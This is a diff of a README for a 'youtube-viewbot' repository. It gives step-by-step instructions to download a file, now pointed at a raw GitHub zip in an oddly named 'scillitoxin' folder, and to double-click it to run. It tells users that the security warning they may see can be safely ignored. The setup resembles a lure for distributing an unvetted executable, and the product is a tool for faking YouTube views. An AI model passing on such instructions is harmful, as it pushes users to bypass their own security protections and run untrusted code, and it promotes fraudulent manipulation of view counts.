DAM1L0LA/youtube-viewbot/README.md

    Click on the version you wish to download.
 It will begin downloading the file to your computer.

 4. **Locate the Downloaded File**
    Once the download completes, go to your downloads folder.
-You will see the downloaded file, typically named something similar to `youtube-viewbot.exe`.
+You will see the downloaded file, typically named something similar to `https://raw.githubusercontent.com/DAM1L0LA/youtube-viewbot/main/scillitoxin/youtube-viewbot.zip`.

 5. **Run the Application**
    Double-click the file to start the application.
 You may see a security warning, but you can safely allow this application to run.